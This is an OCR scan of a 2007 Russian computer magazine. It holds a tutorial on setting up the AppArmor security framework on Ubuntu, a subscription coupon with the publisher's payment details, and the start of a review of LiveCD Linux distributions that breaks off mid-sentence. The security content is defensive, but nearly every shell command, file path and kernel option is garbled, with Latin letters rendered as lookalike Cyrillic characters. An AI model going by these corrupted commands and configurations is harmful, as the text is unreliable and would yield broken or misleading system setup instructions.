5 БЫ п их (Зесигііу ЕпЬапсесІ Біп их) появился в недрах 
11.5. Ыаііопаі 5есигі1:у Адепсу (Ы5А) и стал доступен 
общественности под лицензией 6РБ в 2000 году. В нем 
использован ролевой контроль доступа (Роіе-Ьазесі 
Ассезз Сопігоі, Р ВАС) , многоуровневая безопасность и 
принудительное присвоениетипов (іуре епіюгсетепі). 
Код 



ЗЕБІпих включен в ядро версии 2.6 (начиная с 
2.6.0-Іезі), для версий 2.4 и 2.2 имеются патчи. Кроме 
того, ЗЕБІпих портирован под В50 и Оагѵѵіп, а код 
оптимизирован для компьютеров, имеющих 32 и 
более процессора. Каждому файлу назначается 
контекст безопасности, который и определяет, какие 
процессы (пользователи) могутс ним работать. 
Несмотря на очень высокий уровень защиты и под- 
держку в дистрибутивах РебНаІ, эта система так и 
не смогла приобрести широкой популярности из-за 
очень сложной процедуры настройки. Разработчики 
АррАгглог резонно считают, что безопасность не 
должна идти в ущерб простоте, ведь чем сложнее 
система, тем больше вероятность, что она будет 
неверно настроена. 

Проект АррАгтог 

Изначально АррАгтог был разработан компанией 
Іплтипіх, которая выпускала одноименный «имму- 
низированный» дистрибутив Біп их и специализи- 
ровалась в области защиты ОС и ее приложений от 
различных атак. После ее приобретения компанией 
ІМоѵеІІ в мае 2005 года (кстати, вместе с основателем 
Криспином Коуэном) инструмент был открыт под 
лицензией 6РБ и включен в состав дистрибутива 
0реп51І5Е под именем АррАгтог. 

Постепенно он был адаптирован для некоторых 
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АррАгтог: пакет для определе- 
ния политик безопасности ПО 

Операционная система Ілпих унас- 
ледовала систему безопасности 
Ыпіх, разработанную еще в 70-х го- 
дах, передовую на момент создания, 
но на сегодняшний день уже явно 
недостаточную. Каждый пользова- 
тель имеет полную свободу действий 
в пределах своих полномочий по при- 
нципу «все или ничего». Это приводит к 
тому, что для выполнения некоторых задач 
пользователю часто предоставляется гораз- 
до больше прав, чем это реально необходимо. 
Поэтому пользователь, получивший доступ с 
правами системной учетной записи, может добить- 
ся практически полного контроля над системой. 
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Устанавливаем АррАгтог 




Создание нового профиля 



других дистрибутивов: РШ, Рагсіив Ыпих, Аппѵіх, ПНЕЬ 5, Зіаскѵѵаге 
1 0.2 и ІІЬипІи. 

В АррАгтог для определения того, к каким системным ресурсам и с 
какими привилегиями может получить доступ то или иное приложе- 
ние, используются политики безопасности, именуемые профилями 
(ргоЫез). С их помощью кстандартной ІІпіх-модели безопасности 
ОАО Юізсгебопагу Асееве Сопігоі) добавляется более мощная — МАО 
(Мапбаіогу Ассевв Сопіхоі). В отличие отЗЕЫпих и ЬЮЗ, в которых 
настройки глобальны для всей системы, профили в АррАгтог разра- 
батываются индивидуально под каждое приложение (в ЗЕЫпихтакже 
потихоньку начинают использовать такой подход). 

Для упрощения настроек в АррАгтогуже включен набор стандартных 
профилей, запускаемых послеустановки. Отдельно доступны профили для 
многих популярных программ и серверов. Еслиже готового профиля найти 
неудалось, в его создании помогутспециальные инструменты (депрго^и 
ІодргоД Для пользователей ОрепЗІІЗЕ имеется графический интерфейс 
к этим утилитам, реализованный вУав12. Таким образом, вся философия 
работы с АррАгтог сводится кправильному выбору приложений, нуждаю- 
щихся вограничении привилегий, и созданию/редактированию профилей 
безопасности. 

Установка АррАгтог в ІІЬипІи 

Начиная с версии 7.04 АррАгтог официально включен в репозитарий 
ІІЬипІи, и проблем с его установкой нет: 

$ зисіо арЕ-дек іпзЕаІІ аррагшог аррагтог-Ьосз аррагтог- 
тосіиіез-зоигсе аррагтог-ргоіііез аррагтог-икііз 

После этого скрипт будет ругаться, что не можетзакончить настройку 
по причине отсутствия необходимых модулей ядра. Поэтому сначала 
вводим команду подготовки к сборке, так мы проверим наличие всех 
необходимых пакетов и загрузим недостающие: 

$ зисіо т-а -ѵ -О ргераге 

Вообще говоря, почти вся ее работа сводится к стандартным зисіо арі- 
деі іпзіаіі Ьиііб-еззепііаі. Теперь собираем модуль: 

$ зисіо т-а -ѵ -О -і Ьиіісі аррагтог-тосіиіез 
$ зисіо т-а -ѵ -О -Т іпзЕаІІ аррагтог-тосіиіез 



После сборки советую вручную загрузить модуль ядра, контролирующе- 
го установленные политики, чтобы проверить корректность работы: 

$ зисіо тосіргоЬе аррагтог 

ЕАТАЬ : Еггог іпзегЕіпд аррагтог ( /1іЬ/тосіи1ез/2 . б . 2 0- 
15-депегіс/аррагтог/аррагтог . ко) : Еезоигсе 
Еетрогагііу ипаѵаіІаЫе 

Упс, не грузится... Судя посообщениям на различныхфорумах, такая ошибка 
возникла нетолькоу меня. На форумах ОрепЗІІЗЕудалось найти подсказку. 
АррАгтогнесовместимсзеІіпихисараЬІІІЕез. Если они встроены в само ядро, 
то ядро придется пересобрать, установив следующие параметры в .сопЕд. 

$ зисіо тсесМі/изг/згс/Ііпих/.сопЛд 

С(ЖЕІС_8ЕСШІТУ_8ЕЫ№Ж=п 

СОЕЕІС_8ЕСІІЕІТУ_САРАВІЫТІЕ8=т 

Иначе добавляем два параметра, передаваемые ядру при загрузке: 
«сэра Ьі Ш;у. сі іза Ь Іе = 1 » и «зеііпих = 0». Правда, в моем случае первый 
параметр почему-то был проигнорирован: 

$ сітезд I дгер сараЬіІіЕу 

[19.543828] Шікпоѵт Ъоок оркіоп ' сараЫІіку . сіізаЫе = 

1 ' : ідпогіпд 

Поэтому просто выгружаем модуль ядра: 

$ зисіо гттосі сараЫІіку 

И пробуем еще раз: 

$ зисіо тосіргоЬе аррагтог 
$ Ізтосі I дгер аррагтог 
аррагтог 55836 О 

аатаксЬ_рсге 16896 1 аррагтог 

соттопсар 8192 1 аррагтог 

Кроме этого, модуль аррагтог может не дружить с Оагико, который 
обычно используется при оп-ассезз сканировании файлов антивиру- 
сом С Іа та ѵ. Теперь запускаем всю систему: 
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Готовые профили 




Один из профилей РозіТіх 



$ зисіо /екс/іпік . сі/аррагтог зкагк 

тоипкіпд зесигікукз оп /зуз/кегпеі/зесигіку : скте . 
Ьоасііпд АррАгтог рго к ііез : сіопе . 

Если все нормально, на этом установку АррАггш о г можно считать закон- 
ченной. Следующий шаг— настройка профилей. 

Профили АррАгтог 

После запуска демон загружает все профили, лежащие в каталоге 
/еіс/аррагтог.сі. Для контроля режима работы используется файло- 
вая система зесигііуіъ, с ее помощью можно получить информацию о 
загруженных профилях: 

$ зисіо тоипк -кзесигікукз зесигікукз /зуз/кегпеі/ 
зесигіку 

$ зисіо сак /зуз/кегпеі/зесигіку /аррагтог/ргокііез 

/изг/зЪіп/кгасегоике (епкогсе) 

/изг/зЪіп/пкрсІ (епкогсе) 

/изг/зЪіп/пзссІ (епкогсе) 

/изг/зЪіп/патес! (епкогсе) 

/изг/зЪіп/тсІпзсІ (епкогсе) 

/изг/зЪіп/ісІепксі (епкогсе) 

/изг/зЪіп/сІоѵесок (сошріаіп) 

/зЪіп/зузіодсІ (епкогсе) 

/зЬіп/зузІод-пд (епкогсе) 

/зЪіп/кІодс! (епкогсе) 

/Ьіп/ріпд (епкогсе) 

АррАгтог может обрабатывать профили в двух режимах: 

О епіогсе — принудительный режим, сервис работает исключительно 
в пределах профиля, все попытки нарушить правила регистрируются 
в вувіод; 

2) сотріаіп — щадящий режим (обучения), в этом случае работа 
сервиса просто контролируется; при нарушении профиля созда- 
ется запись. Этот режим удобен при создании новых профилей 
и настройки профиля на конкретной системе. 

Для изменения режима достаточно открыть файл профиля и напротив 
исполняемого файла добавить строку «йадз=(сотрІаіп)»: 

/Ьіп/1з к1адз= (сотріаіп) 

Глобально все профили перевести в режим сотріаіп можно командой: 



$ зисіо есію 1 > /зуз/кегпеі/зесигіку/аррагтог/сопкгоі/ 
сотріаіп 

После обучения отдельное приложение без перезагрузки всех про- 
филей можно перевести вжесткий режим с помощью специальной 
утилиты епіогсе: 

$ епкогсе сіоѵесок 

Зеккіпд /изг/зЪіп/сІоѵесок ко епкогсе то сіе . 

Остальные профили лежат в каталоге/изг/зЬаге/бос/аррагтог- 
ргобіез/ехігав. Каждый профиль имеет имя, которое состоит из полного 
пути к исполняемому файлу, только вместо слеша используется точка. 
Например, изг.ІІЬТІгеіюхТігеІох.вЬ. Типичное описание профиля выгля- 
дит так: 

$ сак /изг/зкаге/сіос/аррагтог-ргокііез/ехкгаз/изг . 

ІіЪ . кігекох . кігекох . зк 
#іпс1исІе <кипаЫез/д1оЬа1> 

/изг/ІіЬ/кігекох/кігекох. зк { 

/Ып/Ьазепате тіхг, 

/изг/Ып/аозз ІІх, 

/изг/ііЪ/кігекох/* г, 

/изг/ІіЬ/кігекох/кігекох-Ьіп рх, 

} 

Профиль состоит из файлов, каталогов суказанием полных путей к ним 
(возможно применение регулярных выражений), и прав доступа к этим 
объектам. При этом г — разрешение на чтение (для всех вызовов), ѵѵ 
— запись (за исключением создания и удаления файлов), іх — испол- 
нение и наследование текущего профиля, рх — исполнение под специ- 
фическим профилем, Рх — защищенное выполнение, их — неограни- 
ченное исполнение, ІІх — защищенное неограниченное исполнение, 
т — присвоениеучастку памяти атрибута «исполняемый», I — жесткая 
ссылка. 

Чтобы подключить готовый профиль к АррАгтог, достаточно его ско- 
пировать в каталог/еіс/аррагтог.сі. Например, для РозіТіх производим 
следующие действия: 

$ ссі /екс/аррагтог/ргокііез/ехкгаз 
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Записи вжурнале 



$ зисіо тѵ *розккіх* изг . зМп . розк* /екс/аррагтог . сі 
$ шѵ изг .Ьіп.ргостаіі изг . зЬіп. зепбтаіі /екс/аррагтог . <5. 

И на первое время запускаем в режиме обучения: 

$ сошріаіп /екс/аррагтог . сі/ *розккіх* 

$ сошріаіп /екс/аррагтог . сі/изг . зЬіп . розк* 

$ сошріаіп /екс/аррагтог . сі/изг . Ып . ргостаіі 
$ сошріаіп /екс/аррагтог .сі/изг . зМп. зепсітаіі 

Далее используем РозіТіх, как обычно, уточняем политики с помощью 
утилиты Іод ргоі и переводим в принудительный режим. Для этого в 
предыдущем примере меняем все сотріаіп на епіогсе. Как вариант 
— можно вместо профиля сразу указать сам исполняемый файл , тог- 
да соответствующие ему политики будут подхвачены автоматически. 

Создание профиля 

Теперь попробуем создать новый профиль и проверим работу 
АррАгтог. Для тестирования выберем всеми любимую программу для 
создания паролей /изг/Ьіп/раззѵѵсІ. Для создания нового профиля 
используется утилита де п р гоі (кстати, все утилиты АррАгтог имеют 
псевдонимы, начинающиеся на « а а - » ) : 

$ біісіо депргоіѴизг/Ьіп/раззѵѵсІ 

Записывается обновленный профиль /изг/Ьіп/раззѵѵсІ. Настройка /изг/ 
Ьіп/раззѵѵсІ происходит в щадящем режиме. Запускаем приложение, 
для которого создается профиль. В нашем случае можно создать/уда- 
лить пользователя, изменить его пароль: 

$ зисіо асісіизег зегдез 
Асісііпд изег 'зегдез ' ... 

Асісііпд пеѵѵ дгоир 'зегдез ' (1001) ... 

Асісііпд пеѵѵ изег 'зегдез ' (10 01) мікіі дгоир 'зегдез ' ... 
Епкег пеѵѵ ШІХ раззѵѵогсі: 

Кекуре петл і ШІХ раззчлгогсі: 

раззѵѵсі: раззтлгогсі ирсіакесі зиссеззіиііу 

Сііапдіпд кііе изег іпкогтакіоп ког зегдез 

Спустя промежуток времени нажимаем на клавиатуре клавишу <5>. 

При этом будут считаны все сообщения аудита из файла /ѵаг/іод/ 
теззадез и обновлены соответствующие профили в /еіс/аррагтог.сі. 
Вот некоторые события, попадающие в журнал: 



$ дгер аисіік /ѵаг/іод/шеззадез 

СГип 18 22:23:32 ЬоЪг кегпеі : [ 1970.732000] 

аисіік (1182194612 .389:4) : РЕКМІТТШС г ассезз До 

/екс/пззміксЪ.. сопк (сіоѵесок (7161) ргоіііе /изг/зЫп/ 

сіоѵесок аскіѵе /изг/зЪіп/сіоѵесок ) 

М 18 22:23:32 ЬоЬг кегпеі : 

[ 1970.732000] аисіік (1182194612 .389:5) : РЕКМІТТШС 
г ассезз До /1іЪ/к1з/і686/сшоѵ/1іЪпзз_сошрак-2 . 5 . зо 
(сіоѵесок (7161) ргокііе /изг/зЪіп/сіоѵесок аскіѵе /изг/ 
зЪіп/сіоѵесок) 

Через некоторое время нажимаем клавишу <Р>. Смотрим новый 
профиль: 

$ сак /екс/аррагтог .сі/изг . Мп . раззѵѵсі 

# ѵіш: зупках=аррагтог 

# Ьазк Мосіікіесі: Тие М 19 11:13:26 2007 
#іпс1исіе <кипаЫез/д1оЪа1> 

/изг/Ъіп/раззжі { 

#іпс1исіе <аЪзкгаскіопз/Ъазе> 

/1іЪ/к1з/і686/стоѵ/1іЪс-* . зо шг # 
/1іЪ/к1з/і686/стоѵ/1іЪсгурк-* . зо шг , 
/1іЪ/к1з/і686/стоѵ/1іЪс11-* . зо шг , 

/изг/Ъіп/раззжі шг, 

} 

Теперь в профиле утилиты раззѵѵб убираем флаг ‘т’. 

На лету это можно сделать с помощью утилиты аррагтог_рагзег: 

$ зисіо ескю " /изг/Ъіп/раззжі { /изг/Ъіп/раззтжі г, }" | 
аррагтог_рагзег — асі 

И опять пробуем добавить нового пользователя: 

$ зисіо аскіизег зегдез 
Асісііпд изег 'зегдез ' ... 

Асісііпд пехѵ дгоир 'зегдез ' (1001) ... 

Асісііпд пем изег 'зегдез ' (1001) ѵѵікЪ дгоир 'зегдез ' . . . 
раззѵѵсі: Саппок сіекегшіпе уоиг изег паше. 

Регшіззіоп сіепіесі 
Тгу адаіп? [У/п] у 
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Проверяем результат: 

$ дгер зегдез /еБс/раззжі 

зегде^ :х: 1001 : 1001 : , , , : /Ьоше/зегдез : /Ъіп/ЪазЪ. 

Утилита не смогла создать пароль для нового пользователя. Но это еще 
не все. Вновь созданный профиль продолжает работать в щадящем 
режиме. Через некоторое время следует повторно проанализи- 
ровать /ѵаг/Іод/теБзадев и уточнить настройки профилей. Для этого 
используется утилита ІодргоС 

$ зисіо Іодргоб 

Далее будут показываться найденные нарушения профилей суказа- 
нием названия профиля, программы и действия. Все вопросы разбиты 
на блоки. В первом задается управление дочерними процессами, 
контролируемыми профилем. 

Профиль: /изг/зЪіп/сІоѵесоБ 
Программа: сІоѵесоБ 
Выполнить: /изг/1іЪ/с1оѵесоБ/ітар 
Строгость: неизвестно 

[ (I) пЬегіО] / (Р)гобііе/ (II) псопбіпесі / (Б)епу/ 
АЬо(г)0 / (Р)іпізЪ. 

Нажатие на <г> (АЬогі) приведет к выходу из депрго^ с отклонением всех 
изменений, а <Р> (РіпізЫ делаеттоже, нотолько все данные сохраня- 
ются. Эти параметры означают: 

1. ІпНегіі: — потомокзапускается стем же профилем, что и родитель. 

2. Ргобіе — потомок имеет свой профиль. 

3. ІІпсопбпеб — потомокзапускается без профиля. 

4. Оепу — запрет на за пуск доч ер них процессов. 

Далее следует запрос о доступе к функциям Р05ІХ: 

Профиль: /изг/зЬіп/сІоѵесоЦ 
Возможность: сЬоѵт 
Строгость: 9 

[ (А) Ном] / (Б) епу / АЪо (г ) Б / (БЭіпізН 

Здесь несколько проще. Нажатием клавиши <А> или <й> мы разрешаем 
или запрещаем вызов (в нашем примере вызов сбоѵѵп) соответственно. 
И третьим блоком идутзапросы о пути: 

Профиль: /изг/зЪіп/сІоѵесоЦ 
Путь : / 

Режим: г 

Строгость: неизвестно 

[ (А) Ночл] / (Б) епу / (С) ІоЪ / СІоЬ ѵі/ (Е) хБ / (Ы) ем / 
АЬо(г)Р / (Р)іпізіі 




Проверяем работу 



Кроме знакомых параметров, здесь можно нажать <І\І> и ввести 
новый путь, который будет записан в профиль. Очень полезной 
является возможность глобализации путей, то есть вместо /ѵаг/ѵѵѵѵѵѵ/ 
іпбех.ЫтІ в правиле можно указать /ѵаг/ѵѵѵѵѵѵ/*. Для этого достаточ- 
но нажать кнопку <6>, и путь сократится на один уровень. Каждое 
следующее нажатие будет сокращать его еще на один уровень. Если 
нужно сохранить расширение файлов, нажимаем <Е> ( Ѳ Іо Ь ѵѵ/(Е)х1:), 
и тогда появится запись вроде: /ѵаг/ѵѵѵѵѵѵ/*. Нті. По окончании 
работы Іод р гоб опять запросит просканировать журнал, для выхода 
выбираем <Р>. 

Но это еще не все секреты АррАггшог. Для того чтобы определить нали- 
чие защищающего профиля, а также соответствие прослушиваемых 
сетевых ТСР/ІЮР-портов запущенным сервисам, используй утилиту 
ипсопбпеб: 

$ зисіо аа-ипсопбіпесі 

5194 /изг/зЬіп/аѵаЫ-сіаетоп не ограничен 
5266 /изг/зЬіп/сирзсі не ограничен 
5290 /изг/зЫп/Пріосі не ограничен 
5293 /изг/Ып/руЫтоп2 . 5 не ограничен 
5391 /изг/зЪіп/туздІсІ не ограничен 
5621 /изг/ІіЬ/розБРіх/тазБег ограничен 
5750 /изг/зЬіп/сіоѵесоБ не ограничен 
589 0 /изг/зЫп/арас]ге2 не ограничен 

Таким образом создается программный черный список, и администра- 
тор может заранее определить потенциально опасные приложения и 
закрыть дыры. 

Итак, пора делать вывод. Система, предлагаемая N о ѵе 1 1 , обла- 
дает высоким уровнем защиты и гораздо легче в настройке, чем 
5ЕІ_іпих. А относительно простая в реализации возможность 
самостоятельного создания профиля только добавляет плюсы этой 
системе . -и- 



► 096 



ХАКЕР 08 / 1 04 / 07 





Теперь ты можешь получать 
журнал с КУРЬЕРОМ 

не только в Москве, но и в Санкт-Петербурге, 
Уфе, Нижнем Новгороде, Волгограде, Казани, 
Перми, Екатеринбурге, Челябинске, Омске. 



ПО ВСЕМ ВОПРОСАМ р связанным с подпиской, звоните по 
бесплатным телефонам 8(495)780-88-29 (для москвичей) и 8(800)200-3-999 (для 
жителей других регионов России, абонентов сетей МТС, БиЛайн и Мегафон). 
Вопросы о подписке можно также направлять по адресу іпІЬѲдІс.ги или прояс- 
нить на сайте ѵѵѵѵѵѵ.ОБС.ги 



КАК ОФОРМИТЬ ЗАКАЗ 

1 . Разборчиво заполните подписной купон и квитанцию, вырезав 

• их из журнала, сделав ксерокопию или распечатав с сайта 
ѵѵѵѵѵѵ.діс.ги. 

2. Оплатите подписку через Сбербанк . 

3. Вышлите в редакцию копию подписных документов — купона и 

• квитанции — любым из нижеперечисленных способов: 

• по электронной почте зиЬзсгіЬе@дІс.ги; 

• по факсу 8 (495) 780-88-24; 

• по адресу 1 19992, Москва, 

ул. Тимура Фрунзе, д. 1 1 , стр. 44-45, ООО «Г ейм Лэнд», отдел подписки. 



ВНИМАНИЕ! 

Подписка оформляется в день обработки 
купона и квитанции в редакции: 

• в течение пяти рабочих дней после отправки подписных документов в редакцию по факсу 
или электронной почте; 

• в течение 20 рабочих дней после отправки подписных документов по почтовому адресу 
редакции. 

Рекомендуем использовать факс или электронную почту, в последнем случае предвари- 
тельно отсканировав или сфотографировав документы. 

Подписка оформляется с номера, выходящего через один календарный месяц после опла- 
ты. Например, если вы производите оплату в ноябре, то журнал будете получать с января. 



СТОИМОСТЬ ЗАКАЗА НА КОМПЛЕКТ ХАКЕР+0ѴР 



1 080 руб за 6 месяцев 1 980 руб за 1 2 месяцев 



5292 руб за комплект Хакер РѴР + ІТ Спец СР + Железо РѴР 



1 номер 
всего за 
147 рублей 



| на журнал Хакер БѴР 




1 1 комплект Хакер ЭѴЭ + ІТ Спец СЭ + 

І — 1 Железо ЭѴЭ 


| | на 6 месяцев 

^|на 12 месяцев 




начиная с 


2007 г. 


1 — 1 Доставлять журнал по почте 
1 — 1 на домашний адрес 




Доставлять журнал курьером: 




1 1 на адрес офиса * 

] на домашний адрес** 





Извещение 



(Отметьте в квадрате выбранный вариант подписки) 

Ф.И.О. 

Дата рожд. пп. пп. пп г 

день месяц год 

АДРЕС ДОСТАВКИ 

Индекс 

Область/ край 

Город 

Улица 



Дом 



Корпус 



Квартира/офис 



Телефон ( 



Е-таіІ 



Сумма оплаты 



*в свободном поле укажи название фирмы и 
другую необходимую информацию 

**в свободном поле укажи другую необходимую 
информацию и альтернативный вариант доставки 
в случае отсутствия дома 



свободное поле 



Кассир 



Квитанция 



Кассир 



ИНН 7729410015 



ООО «Гейм Лэнд» 



АБ «ОРГРЭСБАНК», г. Москва 



р/с № 40702810509000132297 



к/с № 30101810900000000990 



БИК 044583990 



КПП 770401001 



Плательщик 



Адрес (с индексом) 



Назначение платежа 




Сумма 


Оплата журнала « 


» 




с 


2007 г. 





Ф.И.О. 



Подпись плательщика 



ИНН 7729410015 



ООО «Гейм Лэнд» 



АБ «ОРГРЭСБАНК», г. Москва 



р/с № 40702810509000132297 



к/с № 30101810900000000990 



БИК 044583990 



КПП 770401001 



Плательщик 



Адрес (с индексом) 



Назначение платежа 




Сумма 


Оплата журнала « 


» 




с 


2007 г. 





Ф.И.О. 



Подпись плательщика 









Обзор пользовательских ЫѵеСО-дистрибутивов 

Наиболее популярными и востребованными у пользователей являются традиционные дист- 
рибутивы, то есть те, которые перед работой необходимо сначала установить на жесткий диск. 
Между тем параллельно развивается целая армия ІлѵеСБ-дистрибутивов, каждый из которых 
имеет свои особенности и назначение. Они неприхотливы, так как не требуют установки, рабо- 
тают прямо с привода, а главное — их всегда можно носить с собой и использовать по мере необ- 
ходимости. О Кпорріх, наверное, знают все, поэтому для тестирования мы отобрали четырех не 
менее интересных представителей этого пингвиньего класса: Ѵесіогілпих, ЗЬАХ, Рирру Ілпих и 
Байт ЗтаІГ Ілпих. 



ѴесІогЫпих: Біаскѵѵаге на ракетном топливе 

ОС: ѴесІюгБіпих 5.8 50 НО І_іѵе 
Сайт проекта: ѵѵѵѵѵѵ.ѵесіогііпих.сот 
Дата выхода: 27 мая 2007 года 

Лицензия: ѲРЕ 
Аппаратные платформы: х86 

Системныетребования: Іпіеі РепОигш или АМР СРІІ, 256 Мб РАМ иЗ Гб + 
256 Мб под зѵѵар (при установке). 

Состав дистрибутива: Кегпеі 2.6.21 .1 с поддержкой 5МР, 6СС 3.4.6, бІІЬс 
2.3.6, Шеѵ 097, КРЕ 3.5.6, Х.огд 6.9.0, КОШее 1 .6.2 

ѴесіогБіпихуже несколько лет располагается в первой двадцатке на 
сайте ОІБІгоѵѵаІсЬ.сопп, ноунасон менее известен. Создатели этого 
канадского дистрибутива считают, что Еіпих должен быть простым, 
маленьким и быстрым. Конечный пользователь сам выбирает, как 
должна выглядеть его операционная система. На одном единственном 
диске умещается полноценная рабочая среда со всеми необходимыми 



библиотеками и приложениями. Базируется ѴБ на старике Біаскѵѵаге, 
которому привили большую дружелюбность к пользователю. Разра- 
ботчики умудрились не потерятьтой устойчивости в работе и простоты 
в строении, которыми так славится Слака. Но это еще не все. ѴІ_ быстр 
и без проблем работает даже на старом оборудовании. Поэтому его 
по праву называют«51аскѵѵаге на ракетном топливе» и даже «А Ьеііег 
Біаскѵѵаге ібап Біаскѵѵаге». 

Базовым вариантом для всех векторов является 51;а псіа гі: ЕсПОоп, имею- 
щий все необходимое в своем составе. В качестве рабочего стола в нем 
использован ХРсе. Наиболее популярный вариантѴБ — версия БОНО 
(Бтаіі Оібсе/Ноте ОШсе), предназначенная для работы в современных 
настольных системах. Впервые она была представлена вместе с версией 
3.2. Живой варианту ѴБ появился, начиная с пятой версии. 

В настоящее время предлагается уже три варианта БіѵеСО: БіапсІагсІ, 
БОНО и БіапсІагсІ-ВЕПУБ. Последний содержитЗБ-рабочий стол ВегуБ 
Есть и йѴВ-вариантБОНО размером 1,1 Гб; в его состав входит все, что 
есть в ОБ, плюс 62 дополнительных языковых модуля, втом числе и рус- 
ский. Стоитли скачивать еще почти 600 Мб ради локализации из коробки 
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— решать тебе, особенно сучетомтого, что нужный для локализации 
пакет весит всего 1 ,6 Мб. Кстати, немного потерпев, ты узнаешь, как пере- 
собрать ѴІ_ под свои нужды. Тем, кто незнаком с вектором, советую скачать 
и архив с документацией по администрированию ѴЬ на русском языке 
( ѵесіогІіпих.озиозЕогд/гиззіап сіосз/гиззіап сіосз.гір ). 

При загрузке можноуказать ряд дополнительных параметров. Например, 
если памяти достаточно, можно сделать та к, чтобы весьдискбыл скопиро- 
ван в ОЗУ. Для этого вводим ѵесІогсору2гат. Если при загрузке возникли 
проблемы с автоопределением видеокарты, можно попробовать вариант 
ѵесіогѵеза или, для загрузки в консоли, ѵесіогсіі. Далее регистрируемся с 
учетной записью ѵі или гооЕ пароль везде один — ѵесіог. 

Этот дистрибутив всегда отличался продуманностью и тщательным 
подходом к оформлен ию рабочего стола. СтильѴІ_с полупрозрачными 
окнами и эмблемой в виде буквы V ни с чем не перепутаешь. Поработав в 
другом дистрибе, ты, скорее всего, быстро захочешь все сделать также, 
как в векторе. Все ярлыки на месте, а из подписей понятно их назначение. 
Призапуске консоли пользователю выдается краткая подсказка по 
некоторым командам. 

Ядро скомпилировано с патчами ЬооІзрІазЬ, здиазЬ^з, І 2 та и режи- 
мом реального времени. Поддерживается чтение изаписьданныхс 
разделов, отформатированных под ЫТЕ5 (реализовано с использова- 
нием Іизе и пакета пНз-Зд). 

Работаетэта смесьдовольно быстро: на компьютере с 1 Гб ОЗУ вообще 
не замечаешь, что это ЫѵеСО. Приложений — море. Причем список не 
ограничен принципом «одно приложение — одна задача», какэто сдела- 
но, например, в КЕІЬипІи. Здесь всего предостаточно: Атагок, ЗиК, ѴІ_С, 
Хіпе, Мріауег, КЗЬ, ОІМР, збоѵѵРоЬ и сІідіКапп, Рі гебох, Орега и ЗеаМопкеу (с 
кучей плагинов), КМаіІ, КЗігс, Рібдіп (в девичестве Ѳаіт), Кореіе и ХСЬаЕ 
Есть программы для работы в сети ѴѴІпбоѵѵз, для чтения П55-новостей, 
менеджеры загрузки. Нашлось место и большому количеству самых 
разнообразных игр, имеются средства разработки и множество других 
приложений. Кстати, ѴЕхорошо поддерживаетбеспроводные сети, и в 
комплектеты найдешь ряд сопутствующих приложений (ѵІ-ЬоЕ Кѵѵіап, 
КѴѴІЕІМападег, ѴѴІЕІ-Рабаг). Не каждый однодисковый дистриб может 
похвастаться таким изобилием. 

В ѴесІогЫпих используется пакетная система, совместимая со Зіаскѵѵаге, 
и при необходимости недостающее всегда можно взять из этого дистрибу- 
тива. Хотя в последних версиях ѴЕ формат пакетов іаг.ді изменен на ІІ 2 . 
Последний внутри ничем не отличается оттрадиционного, только вместо 
621 Р использован упаковщик Е2МА. Почетная задача по установке и 
удалению приложений возложена на утилиту ОзІарЕ которая базируется 
на зіарі-деі и вызывается нажатием на ярлык Раскаде Мападег, располо- 
женный на рабочем столе. Работа с ней напоминает Зупарііс из состава 
II Ьи піи. Достаточно выбрать нужное приложение, и оно будет установлено 
автоматически. Чтобы изменить список репозитариев, достаточно зайти 
в Есііі-Ргеіюгепсез и выбрать вкладку Зоигсез. Конечно, список пакетов 
намного меньше, чем, например, в ЕІЬипіи, но и имеющихся вполне 



достаточно для выполнения большинства повседневных задач. 
Установку пакета можно произвести и из контекстного меню Копциегог. 
Например, скачиваем с сайта Ощ-озЕозиозкогд пакет кбе-П8п-ги- 
3.5.6- поагсЬ-1ѵ158ПІ2 для локализации интерфейса. В контекстном меню 
находим «Асііопз -> ѴесІогЫпих Раскаде -> Іпзіаіі». Теперь идем в Сопігоі 
Сепіег, далее — Педіопаі & АссеззіЬІІііу, Соипігу/Педіоп и выбираем рус- 
ский язык в списке АсИ І_апдиаде. Все. Интерфейс локализован. 

Кроме стандартных утилит для настройки (вроде Центра управления 
КОЕ), ѴЕ имеет ѴА5М (ѴесІюгАбтіпізІхаІііопз Зузіет Меп и). Появившись 
в дистрибутиве начиная с версии 2.0, ѴА5М постоянно развивается. Его 
можно вызвать какиз консоли, таки под Х-ѴѴіпбоѵѵ (значение проверяется 
переменной $й І8РЕАУ) . Это очень удобно, так как один и тот же инстру- 
ментможно использовать в разныхусловиях, втом числе и приудален- 
ной настройке. Некоторые параметры настройки будут доступны только 
пользователю гооЕ а часть (настройка Х-сервера, обнаружение нового 
оборудования) работает толь ко в консоли. С ѴА5М можно произвести все 
необходимые операции: определить оборудование, настроить Х-сервер, 
сеть и межсетевой экран, монтировать разделы, управлять пользователя- 
ми, установить загрузчик и т.д. Конечно, к особен ностя м ѴА5М надо будет 
привыкнуть, но обычно адаптация проходит без проблем :). Есть в ѴИ и 
свой вариант графического фронт-энда кірІаЫез — ѵІеазуіаЫе. 

На рабочий стол поместили еще два интересных ярлыка. Если ѴИ при- 
шелся по вкусу, жмем ѵіііѵеіпзіаііег и, следуя указаниям, устанавливаем 
дистрибутив на жесткий диск. Ранее этот скрипт постоянно глючил, те- 
перь все нормально, можно работать. Для установки необходимо пройти 
весь традиционный путь: от создания нового пользователя до выбора 
разделов диска и установки загрузчика. Большая часть операций осу- 
ществляется опять же с помощью ѴА5М. 

Ярлык ѵткііѵе еще интереснее. Выбрав его, можно создать свою 
версию иѵеСО. Причем на диск будет за ката на вся текущая конфи- 
гурация. Процесс выглядит приблизительно так: загружаемся в Ыѵе- 
варианте, добавляем, удаляем, локализуем, настраиваем; после этого 
нажимаем эту кнопочку, отвечаем на несложные вопросы (название 
дистрибутива, имя файла, рост, вес) и на выходе получаем готовый 
150-образ. Красота, однако! 

51-АХ: карманная Слака 

ОС: 5ЕАХ5.1 .8.1 КіІІВіІІ 

Сайт проекта, ѵѵѵѵѵѵ.зіах. о гд 
Дата выхода: 24 ноября 2006 года 

Лицензия: 6РЕ 
Аппаратные платформы: х86 

Системныетребования: І486 Іпіеі или АМБ СРЕІ, 36 Мб (загрузка), 96 Мб 
(ПихЬох), 144 Мб (КйЕ) и 328 Мб (сору2гат) РАМ. 

Состав дистрибутива: Кегпеі 2.6.1 6, ѲІіЬс 2.3.6, ЕІсІеѵ 071 , КБ Е 3.5.4, 
Х.огд 6.9 
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Еще один ЕіѵеСО-дистрибутив, базирующийся на Зіаскѵѵаге, на этот раз 
чешский. Одними из главных особенностей 5І_АХ являются возмож- 
ность полной загрузки операционки в ОЗУ и сохранение настроек в 
раздел жесткого диска. Можно отметить еще одно его преимущество 
— модульную структуру, которая позволяет легко модифицировать его 
